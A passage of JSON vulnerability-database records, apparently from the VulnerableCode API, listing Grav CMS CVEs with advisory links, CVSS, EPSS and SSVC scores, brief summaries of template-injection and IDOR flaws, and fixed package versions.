"https://api.first.org/data/v1/epss?cve=CVE-2025-66296" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:05:57Z/" } ], "url": "https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66296", "reference_id": "CVE-2025-66296", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66296" }, { "reference_url": "https://github.com/advisories/GHSA-cjcp-qxvg-4rjm", "reference_id": "GHSA-cjcp-qxvg-4rjm", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cjcp-qxvg-4rjm" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-cjcp-qxvg-4rjm", "reference_id": "GHSA-cjcp-qxvg-4rjm", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:05:57Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-cjcp-qxvg-4rjm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27" } ], "aliases": [ "CVE-2025-66296", "GHSA-cjcp-qxvg-4rjm" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fmmu-r77k-c7g2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/45432?format=api", "vulnerability_id": "VCID-jsuh-8ssu-gfh3", "summary": "Improper Control of Generation of Code ('Code Injection')\nGrav is a flat-file content management system. Prior to version 1.7.42, the patch for CVE-2022-2073, a server-side template injection vulnerability in Grav leveraging the default `filter()` function, does not block other built-in functions exposed by Twig's Core Extension that could be used to invoke arbitrary unsafe functions, thereby allowing for remote code execution. A patch in version 1.74.2 overrides the built-in Twig `map()` and `reduce()` filter functions in `system/src/Grav/Common/Twig/Extension/GravExtension.php` to validate the argument passed to the filter in `$arrow`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34448", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.08847", "scoring_system": "epss", "scoring_elements": "0.92701", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34448" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec" }, { "reference_url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b" }, { "reference_url": "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/" } ], "url": "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8" }, { "reference_url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5" }, { "reference_url": "https://github.com/twigphp/Twig/blob/v1.44.7/src/Environment.php#L148", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/" } ], "url": "https://github.com/twigphp/Twig/blob/v1.44.7/src/Environment.php#L148" }, { "reference_url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66" }, { "reference_url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/" } ], "url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/" }, { "reference_url": "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/" } ], "url": "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34448", "reference_id": "CVE-2023-34448", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34448" }, { "reference_url": "https://github.com/advisories/GHSA-whr7-m3f8-mpm8", "reference_id": "GHSA-whr7-m3f8-mpm8", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-whr7-m3f8-mpm8" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-whr7-m3f8-mpm8", "reference_id": "GHSA-whr7-m3f8-mpm8", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-whr7-m3f8-mpm8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/65586?format=api", "purl": "pkg:composer/getgrav/grav@1.7.42", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1ps5-3k43-p3fa" }, { "vulnerability": "VCID-4a2z-37a3-2qaw" }, { "vulnerability": "VCID-5kr2-3ywy-9kcn" }, { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-7jaz-7xjc-kka1" }, { "vulnerability": "VCID-9j1y-z47y-xudz" }, { "vulnerability": "VCID-9tu1-4n1t-6bgv" }, { "vulnerability": "VCID-a375-aqzf-r7gw" }, { "vulnerability": "VCID-a8df-4jgt-gba4" }, { "vulnerability": "VCID-a8y8-y4zt-zqbv" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-abwg-zvc9-w7dq" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-bafn-ne38-nucy" }, { "vulnerability": "VCID-bhhz-z132-zkhb" }, { "vulnerability": "VCID-bwvg-jg4z-nyhp" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-egxp-rctq-xyh8" }, { "vulnerability": "VCID-esjd-ztwe-c3h1" }, { "vulnerability": "VCID-f3wx-5ayr-tqga" }, { "vulnerability": "VCID-fmmu-r77k-c7g2" }, { "vulnerability": "VCID-k8fd-bqpk-2qg8" }, { "vulnerability": "VCID-kbnn-6uws-kqh9" }, { "vulnerability": "VCID-p1u7-9mk4-fkcr" }, { "vulnerability": "VCID-p5d4-8rvg-uqem" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-rj4b-8dyu-juen" }, { "vulnerability": "VCID-ru55-uj84-p3dr" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-ss11-shq5-qqae" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-v8u1-nbxw-a7fr" }, { "vulnerability": "VCID-v9n7-vann-6fa5" }, { "vulnerability": "VCID-vm87-35gf-eyft" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" }, { "vulnerability": "VCID-y7vc-cx37-7ubs" }, { "vulnerability": "VCID-yh73-zyju-vqge" }, { "vulnerability": "VCID-ymnw-h6as-fbe5" }, { "vulnerability": "VCID-zg5t-uqx2-87fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42" } ], "aliases": [ "CVE-2023-34448", "GHSA-whr7-m3f8-mpm8" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jsuh-8ssu-gfh3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49332?format=api", "vulnerability_id": "VCID-k8fd-bqpk-2qg8", "summary": "Grav vulnerable to Information Disclosure via IDOR in Grav Admin Panel\nAn **IDOR (Insecure Direct Object Reference)** vulnerability in the Grav CMS Admin Panel allows **low-privilege users to access sensitive information** from other accounts.\nAlthough direct account takeover is not possible, **admin email addresses and other metadata can be exposed**, increasing the risk of phishing, credential stuffing, and social engineering.\n\n---", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66306", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00045", "scoring_system": "epss", "scoring_elements": "0.14231", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66306" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/b7e1958a6e807ac14919447b60e5204a2ea77f62", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:11:21Z/" } ], "url": "https://github.com/getgrav/grav/commit/b7e1958a6e807ac14919447b60e5204a2ea77f62" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66306", "reference_id": "CVE-2025-66306", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66306" }, { "reference_url": "https://github.com/advisories/GHSA-4cwq-j7jv-qmwg", "reference_id": "GHSA-4cwq-j7jv-qmwg", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4cwq-j7jv-qmwg" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-4cwq-j7jv-qmwg", "reference_id": "GHSA-4cwq-j7jv-qmwg", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:11:21Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-4cwq-j7jv-qmwg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27" } ], "aliases": [ "CVE-2025-66306", "GHSA-4cwq-j7jv-qmwg" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-k8fd-bqpk-2qg8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49317?format=api", "vulnerability_id": "VCID-kbnn-6uws-kqh9", "summary": "Grav is Vulnerable to Security Sandbox Bypass with SSTI (Server Side Template Injection)\nGrav CMS is vulnerable to a Server-Side Template Injection (SSTI) that allows any authenticated user with editor permissions to execute arbitrary code on the remote server, bypassing the existing security sandbox.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66299", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00154", "scoring_system": "epss", "scoring_elements": "0.35852", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66299" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:07:46Z/" } ], "url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66299", "reference_id": "CVE-2025-66299", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66299" }, { "reference_url": "https://github.com/advisories/GHSA-gjc5-8cfh-653x", "reference_id": "GHSA-gjc5-8cfh-653x", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gjc5-8cfh-653x" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-gjc5-8cfh-653x", "reference_id": "GHSA-gjc5-8cfh-653x", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:07:46Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-gjc5-8cfh-653x" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27" } ], "aliases": [ "CVE-2025-66299", "GHSA-gjc5-8cfh-653x" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kbnn-6uws-kqh9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/45431?format=api", "vulnerability_id": "VCID-m1sj-emwx-5fek", "summary": "Improper Control of Generation of Code ('Code Injection')\nGrav is a flat-file content management system. Versions prior to 1.7.42 is vulnerable to server side template injection. Remote code execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. Version 1.7.42 contains a fix for this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34251", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.02554", "scoring_system": "epss", "scoring_elements": "0.85799", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34251" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174", "reference_id": "", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-27T16:52:48Z/" } ], "url": "https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174" }, { "reference_url": "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec" }, { "reference_url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b" }, { "reference_url": "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8" }, { "reference_url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5", "reference_id": "", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-27T16:52:48Z/" } ], "url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34251", "reference_id": "CVE-2023-34251", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34251" }, { "reference_url": "https://github.com/advisories/GHSA-f9jf-4cp4-4fq5", "reference_id": "GHSA-f9jf-4cp4-4fq5", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-f9jf-4cp4-4fq5" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5", "reference_id": "GHSA-f9jf-4cp4-4fq5", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-27T16:52:48Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/65586?format=api", "purl": "pkg:composer/getgrav/grav@1.7.42", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1ps5-3k43-p3fa" }, { "vulnerability": "VCID-4a2z-37a3-2qaw" }, { "vulnerability": "VCID-5kr2-3ywy-9kcn" }, { "vulnerability": 